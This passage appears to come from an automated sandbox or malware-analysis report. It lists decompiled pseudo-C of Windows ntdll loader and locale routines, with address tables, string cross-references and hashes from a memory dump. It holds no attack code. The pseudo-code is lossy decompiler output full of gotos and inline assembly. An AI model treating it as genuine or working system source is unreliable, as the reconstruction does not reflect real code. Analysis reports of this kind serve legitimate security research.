                                                                                                                						_v20 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						__eflags = _t118;
                                                                                                                						if(_t118 != 0) {
                                                                                                                							__eflags = _t161;
                                                                                                                							if(_t161 != 0) {
                                                                                                                								__eflags =  *(_t118 + 8);
                                                                                                                								if( *(_t118 + 8) == 0) {
                                                                                                                									L22:
                                                                                                                									_t143 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_t19 = _t118 + 0x40; // 0x40
                                                                                                                									_t156 = _t19;
                                                                                                                									E01208999(_t19,  &_v16);
                                                                                                                									__eflags = _v0;
                                                                                                                									if(_v0 != 0) {
                                                                                                                										__eflags = _v0 - 1;
                                                                                                                										if(_v0 != 1) {
                                                                                                                											goto L22;
                                                                                                                										} else {
                                                                                                                											_t128 =  *(_t161 + 0x64);
                                                                                                                											__eflags =  *(_t161 + 0x64);
                                                                                                                											if( *(_t161 + 0x64) == 0) {
                                                                                                                												goto L22;
                                                                                                                											} else {
                                                                                                                												E01208999(_t128,  &_v12);
                                                                                                                												_t147 = _v12;
                                                                                                                												_t91 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												_t129 =  *_t147;
                                                                                                                												while(1) {
                                                                                                                													__eflags =  *((intOrPtr*)(0x12e5c60 + _t91 * 8)) - _t129;
                                                                                                                													if( *((intOrPtr*)(0x12e5c60 + _t91 * 8)) == _t129) {
                                                                                                                														break;
                                                                                                                													}
                                                                                                                													_t91 = _t91 + 1;
                                                                                                                													__eflags = _t91 - 5;
                                                                                                                													if(_t91 < 5) {
                                                                                                                														continue;
                                                                                                                													} else {
                                                                                                                														_t131 = 0;
                                                                                                                														__eflags = 0;
                                                                                                                													}
                                                                                                                													L37:
                                                                                                                													__eflags = _t131;
                                                                                                                													if(_t131 != 0) {
                                                                                                                														goto L22;
                                                                                                                													} else {
                                                                                                                														__eflags = _v16 - _t147;
                                                                                                                														if(_v16 != _t147) {
                                                                                                                															goto L22;
                                                                                                                														} else {
                                                                                                                															E01212280(_t92, 0x12e86cc);
                                                                                                                															_t94 = E012C9DFB( &_v20);
                                                                                                                															__eflags = _t94 - 1;
                                                                                                                															if(_t94 != 1) {
                                                                                                                															}
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															_t95 = E012261A0( &_v32);
                                                                                                                															__eflags = _t95;
                                                                                                                															if(_t95 != 0) {
                                                                                                                																__eflags = _v32 | _v28;
                                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                                                                                																	_t134 = _t71;
                                                                                                                																	goto L55;
                                                                                                                																}
                                                                                                                															}
                                                                                                                															goto L30;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L56;
                                                                                                                												}
                                                                                                                												_t92 = 0x12e5c64 + _t91 * 8;
                                                                                                                												asm("lock xadd [eax], ecx");
                                                                                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                                                												goto L37;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L56;
                                                                                                                									} else {
                                                                                                                										_t143 = E01208A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                                                										__eflags = _t143;
                                                                                                                										if(_t143 != 0) {
                                                                                                                											_t157 = _v12;
                                                                                                                											_t103 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                											_t136 =  &(_t157[1]);
                                                                                                                											 *(_t161 + 0x64) = _t136;
                                                                                                                											_t151 =  *_t157;
                                                                                                                											_v20 = _t136;
                                                                                                                											while(1) {
                                                                                                                												__eflags =  *((intOrPtr*)(0x12e5c60 + _t103 * 8)) - _t151;
                                                                                                                												if( *((intOrPtr*)(0x12e5c60 + _t103 * 8)) == _t151) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												_t103 = _t103 + 1;
                                                                                                                												__eflags = _t103 - 5;
                                                                                                                												if(_t103 < 5) {
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                												L21:
                                                                                                                												_t105 = E0123F380(_t136, 0x11d1184, 0x10);
                                                                                                                												__eflags = _t105;
                                                                                                                												if(_t105 != 0) {
                                                                                                                													__eflags =  *_t157 -  *_v16;
                                                                                                                													if( *_t157 >=  *_v16) {
                                                                                                                														goto L22;
                                                                                                                													} else {
                                                                                                                														asm("cdq");
                                                                                                                														_t166 = _t157[5] & 0x0000ffff;
                                                                                                                														_t108 = _t157[5] & 0x0000ffff;
                                                                                                                														asm("cdq");
                                                                                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                                                														if(__eflags > 0) {
                                                                                                                															L29:
                                                                                                                															E01212280(_t108, 0x12e86cc);
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															_t42 = _t118 + 0x40; // 0x3f
                                                                                                                															_t156 = _t42;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															_t110 = E012261A0( &_v32);
                                                                                                                															__eflags = _t110;
                                                                                                                															if(_t110 != 0) {
                                                                                                                																__eflags = _v32 | _v28;
                                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                                																	_t134 = _v20;
                                                                                                                																	L55:
                                                                                                                																	E012C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                                                																}
                                                                                                                															}
                                                                                                                															L30:
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															E0120FFB0(_t118, _t156, 0x12e86cc);
                                                                                                                															goto L22;
                                                                                                                														} else {
                                                                                                                															if(__eflags < 0) {
                                                                                                                																goto L22;
                                                                                                                															} else {
                                                                                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                                                																	goto L22;
                                                                                                                																} else {
                                                                                                                																	goto L29;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L56;
                                                                                                                												}
                                                                                                                												goto L22;
                                                                                                                											}
                                                                                                                											asm("lock inc dword [eax]");
                                                                                                                											goto L21;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return _t143;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push( &_v8);
                                                                                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                                                					_push(__ecx + 0x40);
                                                                                                                					_push(_t121);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t80 = E01239A00();
                                                                                                                					_t159 = _t80;
                                                                                                                					if(_t159 < 0) {
                                                                                                                						L8:
                                                                                                                						return _t80;
                                                                                                                					} else {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L56:
                                                                                                                			}












































                                                                                                                0x01208996
                                                                                                                0x00000000
                                                                                                                0x01208996
                                                                                                                0x0120894c
                                                                                                                0x00000000
                                                                                                                0x01208870
                                                                                                                0x0120887b
                                                                                                                0x0120887d
                                                                                                                0x0120887f
                                                                                                                0x01208881
                                                                                                                0x01208884
                                                                                                                0x01208884
                                                                                                                0x01208886
                                                                                                                0x01208889
                                                                                                                0x0120888c
                                                                                                                0x0120888e
                                                                                                                0x01208891
                                                                                                                0x01208891
                                                                                                                0x01208898
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0120889a
                                                                                                                0x0120889b
                                                                                                                0x0120889e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012088a0
                                                                                                                0x012088a8
                                                                                                                0x012088b0
                                                                                                                0x012088b2
                                                                                                                0x012088d3
                                                                                                                0x012088d5
                                                                                                                0x00000000
                                                                                                                0x012088d7
                                                                                                                0x012088db
                                                                                                                0x012088dc
                                                                                                                0x012088e0
                                                                                                                0x012088e8
                                                                                                                0x012088ee
                                                                                                                0x012088f0
                                                                                                                0x012088f3
                                                                                                                0x012088fc
                                                                                                                0x01208901
                                                                                                                0x01208906
                                                                                                                0x0120890c
                                                                                                                0x0120890c
                                                                                                                0x0120890f
                                                                                                                0x01208916
                                                                                                                0x01208917
                                                                                                                0x01208918
                                                                                                                0x01208919
                                                                                                                0x0120891a
                                                                                                                0x0120891f
                                                                                                                0x01208921
                                                                                                                0x01259c52
                                                                                                                0x01259c55
                                                                                                                0x01259c5b
                                                                                                                0x01259cac
                                                                                                                0x01259cc0
                                                                                                                0x01259cc0
                                                                                                                0x01259c55
                                                                                                                0x01208927
                                                                                                                0x01208927
                                                                                                                0x0120892f
                                                                                                                0x01208933
                                                                                                                0x00000000
                                                                                                                0x012088f5
                                                                                                                0x012088f5
                                                                                                                0x00000000
                                                                                                                0x012088f7
                                                                                                                0x012088f7
                                                                                                                0x012088fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012088fa
                                                                                                                0x012088f5
                                                                                                                0x012088f3
                                                                                                                0x00000000
                                                                                                                0x012088d5
                                                                                                                0x00000000
                                                                                                                0x012088b2
                                                                                                                0x012088c9
                                                                                                                0x00000000
                                                                                                                0x012088c9
                                                                                                                0x0120887f
                                                                                                                0x0120886a
                                                                                                                0x01208857
                                                                                                                0x01208852
                                                                                                                0x012088bf
                                                                                                                0x012088bf
                                                                                                                0x012087aa
                                                                                                                0x012087ad
                                                                                                                0x012087ae
                                                                                                                0x012087b4
                                                                                                                0x012087b5
                                                                                                                0x012087b6
                                                                                                                0x012087b8
                                                                                                                0x012087bd
                                                                                                                0x012087c1
                                                                                                                0x012087f4
                                                                                                                0x012087fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012087c1
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01259C18
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01259C28
                                                                                                                • LdrpDoPostSnapWork, xrefs: 01259C1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 2994545307-1948996284
                                                                                                                • Opcode ID: 8d675f7bc1c91c681b904f979c572734ec0b415a0a785b8d72e434903bdb3153
                                                                                                                • Instruction ID: 97920d6f8aefb4623b700dfb84b69a2f983c6a3b5493281f8ce13fbb1d5a6eb1
                                                                                                                • Opcode Fuzzy Hash: 8d675f7bc1c91c681b904f979c572734ec0b415a0a785b8d72e434903bdb3153
                                                                                                                • Instruction Fuzzy Hash: 25912131E2021BDFEF1ADF58D481ABBB7B5FF44314B044269DA01AB282D770AE40CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E01207E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _t73;
                                                                                                                				void* _t77;
                                                                                                                				char* _t82;
                                                                                                                				char* _t87;
                                                                                                                				signed char* _t97;
                                                                                                                				signed char _t102;
                                                                                                                				intOrPtr _t107;
                                                                                                                				signed char* _t108;
                                                                                                                				intOrPtr _t112;
                                                                                                                				intOrPtr _t124;
                                                                                                                				intOrPtr _t125;
                                                                                                                				intOrPtr _t126;
                                                                                                                
                                                                                                                				_t107 = __edx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                				_t124 = 0;
                                                                                                                				_v20 = __edx;
                                                                                                                				if(E0120CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                                                					_t112 = _v8;
                                                                                                                				} else {
                                                                                                                					_t112 = 0;
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				if(_t112 != 0) {
                                                                                                                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                                                						_t124 = 0xc000007b;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                                                					 *(_t125 + 0x34) = _t73;
                                                                                                                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                                                					_t124 = E011FC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                                                					if(_t124 < 0) {
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                                                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                                                						L8:
                                                                                                                						return _t124;
                                                                                                                					}
                                                                                                                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                                                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						_t102 =  *0x12e5780; // 0x0
                                                                                                                						if((_t102 & 0x00000003) != 0) {
                                                                                                                							E01275510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                                                							_t102 =  *0x12e5780; // 0x0
                                                                                                                						}
                                                                                                                						if((_t102 & 0x00000010) != 0) {
                                                                                                                							asm("int3");
                                                                                                                						}
                                                                                                                						_t124 = 0xc0000428;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_t77 = _a4 - 0x40000003;
                                                                                                                					if(_t77 == 0 || _t77 == 0x33) {
                                                                                                                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                						if(E01217D50() != 0) {
                                                                                                                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                						} else {
                                                                                                                							_t82 = 0x7ffe0384;
                                                                                                                						}
                                                                                                                						_t108 = 0x7ffe0385;
                                                                                                                						if( *_t82 != 0) {
                                                                                                                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                								if(E01217D50() == 0) {
                                                                                                                									_t97 = 0x7ffe0385;
                                                                                                                								} else {
                                                                                                                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                								}
                                                                                                                								if(( *_t97 & 0x00000020) != 0) {
                                                                                                                									E01277016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_a4 != 0x40000003) {
                                                                                                                							L14:
                                                                                                                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                							if(E01217D50() != 0) {
                                                                                                                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                							} else {
                                                                                                                								_t87 = 0x7ffe0384;
                                                                                                                							}
                                                                                                                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                								if(E01217D50() != 0) {
                                                                                                                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                								}
                                                                                                                								if(( *_t108 & 0x00000020) != 0) {
                                                                                                                									E01277016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							_v16 = _t125 + 0x24;
                                                                                                                							_t124 = E0122A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                                                							if(_t124 < 0) {
                                                                                                                								E011FB1E1(_t124, 0x1490, 0, _v16);
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Strings
                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01259891
                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 012598A2
                                                                                                                • LdrpCompleteMapModule, xrefs: 01259898
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                • API String ID: 0-1676968949
                                                                                                                • Opcode ID: 0314521dbaba69ce46b4bd20432b195a6c4c5eaf7d56094ec0146cb2621bf056
                                                                                                                • Instruction ID: 81262e1e3ac7d9f82b277c3cbd585621e231ff7e5d02a6d3042c13d62e7f08d3
                                                                                                                • Opcode Fuzzy Hash: 0314521dbaba69ce46b4bd20432b195a6c4c5eaf7d56094ec0146cb2621bf056
                                                                                                                • Instruction Fuzzy Hash: 1C511231621746DBEB22CB6CC988B2A7BF4AF00318F140699EA919B7D2D774FD40C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E011FE620(void* __ecx, short* __edx, short* _a4) {
                                                                                                                				char _v16;
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char* _v28;
                                                                                                                				char _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				signed int _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				void* _v56;
                                                                                                                				void* _v60;
                                                                                                                				char _v64;
                                                                                                                				void* _v68;
                                                                                                                				void* _v76;
                                                                                                                				void* _v84;
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t74;
                                                                                                                				signed short* _t75;
                                                                                                                				signed int _t76;
                                                                                                                				signed short* _t78;
                                                                                                                				signed int _t83;
                                                                                                                				short* _t93;
                                                                                                                				signed short* _t94;
                                                                                                                				short* _t96;
                                                                                                                				void* _t97;
                                                                                                                				signed int _t99;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t80 = __ecx;
                                                                                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                                                				_t96 = __edx;
                                                                                                                				_v44 = __edx;
                                                                                                                				_t78 = 0;
                                                                                                                				_v56 = 0;
                                                                                                                				if(__ecx == 0 || __edx == 0) {
                                                                                                                					L28:
                                                                                                                					_t97 = 0xc000000d;
                                                                                                                				} else {
                                                                                                                					_t93 = _a4;
                                                                                                                					if(_t93 == 0) {
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                					_t78 = E011FF358(__ecx, 0xac);
                                                                                                                					if(_t78 == 0) {
                                                                                                                						_t97 = 0xc0000017;
                                                                                                                						L6:
                                                                                                                						if(_v56 != 0) {
                                                                                                                							_push(_v56);
                                                                                                                							E012395D0();
                                                                                                                						}
                                                                                                                						if(_t78 != 0) {
                                                                                                                							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                                                						}
                                                                                                                						return _t97;
                                                                                                                					}
                                                                                                                					E0123FA60(_t78, 0, 0x158);
                                                                                                                					_v48 = _v48 & 0x00000000;
                                                                                                                					_t102 = _t101 + 0xc;
                                                                                                                					 *_t96 = 0;
                                                                                                                					 *_t93 = 0;
                                                                                                                					E0123BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                                                					_v36 = 0x18;
                                                                                                                					_v28 =  &_v44;
                                                                                                                					_v64 = 0;
                                                                                                                					_push( &_v36);
                                                                                                                					_push(0x20019);
                                                                                                                					_v32 = 0;
                                                                                                                					_push( &_v64);
                                                                                                                					_v24 = 0x40;
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_t97 = E01239600();
                                                                                                                					if(_t97 < 0) {
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					E0123BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                                                					_push(0);
                                                                                                                					_v48 = 4;
                                                                                                                					_t97 = L011FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                                                					if(_t97 >= 0) {
                                                                                                                						if(_v52 != 1) {
                                                                                                                							L17:
                                                                                                                							_t97 = 0xc0000001;
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                						_t59 =  *_t78 & 0x0000ffff;
                                                                                                                						_t94 = _t78;
                                                                                                                						_t83 = _t59;
                                                                                                                						if(_t59 == 0) {
                                                                                                                							L19:
                                                                                                                							if(_t83 == 0) {
                                                                                                                								L23:
                                                                                                                								E0123BB40(_t83, _t102 + 0x24, _t78);
                                                                                                                								if(L012043C0( &_v48,  &_v64) == 0) {
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								_t84 = _v48;
                                                                                                                								 *_v48 = _v56;
                                                                                                                								if( *_t94 != 0) {
                                                                                                                									E0123BB40(_t84, _t102 + 0x24, _t94);
                                                                                                                									if(L012043C0( &_v48,  &_v64) != 0) {
                                                                                                                										 *_a4 = _v56;
                                                                                                                									} else {
                                                                                                                										_t97 = 0xc0000001;
                                                                                                                										 *_v48 = 0;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                							_t83 = _t83 & 0x0000ffff;
                                                                                                                							while(_t83 == 0x20) {
                                                                                                                								_t94 =  &(_t94[1]);
                                                                                                                								_t74 =  *_t94 & 0x0000ffff;
                                                                                                                								_t83 = _t74;
                                                                                                                								if(_t74 != 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						} else {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							L14:
                                                                                                                							_t27 =  &(_t94[1]); // 0x2
                                                                                                                							_t75 = _t27;
                                                                                                                							if(_t83 == 0x2c) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t94 = _t75;
                                                                                                                							_t76 =  *_t94 & 0x0000ffff;
                                                                                                                							_t83 = _t76;
                                                                                                                							if(_t76 != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						 *_t94 = 0;
                                                                                                                						_t94 = _t75;
                                                                                                                						_t83 =  *_t75 & 0x0000ffff;
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 011FE68C
                                                                                                                • InstallLanguageFallback, xrefs: 011FE6DB
                                                                                                                • @, xrefs: 011FE6C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: 096aa2c8215a490dae8cd95c5bd88969dd9df9ba3372ab643ad5d49b51d7a562
                                                                                                                • Instruction ID: be3a6a3ab04172371386a384dc79326a3032a002cd3ff4c7c204b9fecabca152
                                                                                                                • Opcode Fuzzy Hash: 096aa2c8215a490dae8cd95c5bd88969dd9df9ba3372ab643ad5d49b51d7a562
                                                                                                                • Instruction Fuzzy Hash: A751D4B26153469BD718DF28C480A7BB7E8FF98614F05092EFA85D7250F734D904C792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E012BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _v40;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				signed int _v52;
                                                                                                                				unsigned int _v56;
                                                                                                                				char _v60;
                                                                                                                				signed int _v64;
                                                                                                                				char _v68;
                                                                                                                				signed int _v72;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				char _t87;
                                                                                                                				signed int _t90;
                                                                                                                				signed int _t94;
                                                                                                                				signed int _t100;
                                                                                                                				intOrPtr* _t113;
                                                                                                                				signed int _t122;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                				signed int _t139;
                                                                                                                				signed int* _t141;
                                                                                                                				signed int _t146;
                                                                                                                				signed int _t147;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t155;
                                                                                                                				signed int _t159;
                                                                                                                				char _t166;
                                                                                                                				void* _t172;
                                                                                                                				void* _t176;
                                                                                                                				signed int _t177;
                                                                                                                				intOrPtr* _t179;
                                                                                                                
                                                                                                                				_t179 = __ecx;
                                                                                                                				_v48 = __edx;
                                                                                                                				_v68 = 0;
                                                                                                                				_v72 = 0;
                                                                                                                				_push(__ecx[1]);
                                                                                                                				_push( *__ecx);
                                                                                                                				_push(0);
                                                                                                                				_t153 = 0x14;
                                                                                                                				_t135 = _t153;
                                                                                                                				_t132 = E012BBBBB(_t135, _t153);
                                                                                                                				if(_t132 == 0) {
                                                                                                                					_t166 = _v68;
                                                                                                                					goto L43;
                                                                                                                				} else {
                                                                                                                					_t155 = 0;
                                                                                                                					_v52 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					_v56 = __ecx[1];
                                                                                                                					if( *__ecx >> 8 < 2) {
                                                                                                                						_t155 = 1;
                                                                                                                						_v52 = 1;
                                                                                                                					}
                                                                                                                					_t139 = _a4;
                                                                                                                					_t87 = (_t155 << 0xc) + _t139;
                                                                                                                					_v60 = _t87;
                                                                                                                					if(_t87 < _t139) {
                                                                                                                						L11:
                                                                                                                						_t166 = _v68;
                                                                                                                						L12:
                                                                                                                						if(_t132 != 0) {
                                                                                                                							E012BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                                                						}
                                                                                                                						L43:
                                                                                                                						if(_v72 != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                                                							_push( *_t179);
                                                                                                                							_push(0x8000);
                                                                                                                							E012BAFDE( &_v72,  &_v60);
                                                                                                                						}
                                                                                                                						L46:
                                                                                                                						return _t166;
                                                                                                                					}
                                                                                                                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                					asm("sbb edi, edi");
                                                                                                                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                                                					if(_t90 != 0) {
                                                                                                                						_push(0);
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v44);
                                                                                                                						_push(3);
                                                                                                                						_push(_t179);
                                                                                                                						_push(0xffffffff);
                                                                                                                						if(E01239730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                                                							_push(_t139);
                                                                                                                							E012BA80D(_t179, 1, _v40, 0);
                                                                                                                							_t172 = 4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t141 =  &_v72;
                                                                                                                					if(E012BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                                                						_v64 = _a4;
                                                                                                                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                						asm("sbb edi, edi");
                                                                                                                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                                                						if(_t94 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(0x14);
                                                                                                                							_push( &_v24);
                                                                                                                							_push(3);
                                                                                                                							_push(_t179);
                                                                                                                							_push(0xffffffff);
                                                                                                                							if(E01239730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                                                								_push(_t141);
                                                                                                                								E012BA80D(_t179, 1, _v20, 0);
                                                                                                                								_t176 = 4;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(E012BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                                                							goto L11;
                                                                                                                						} else {
                                                                                                                							_t177 = _v64;
                                                                                                                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                                                							_t100 = _v52 + _v52;
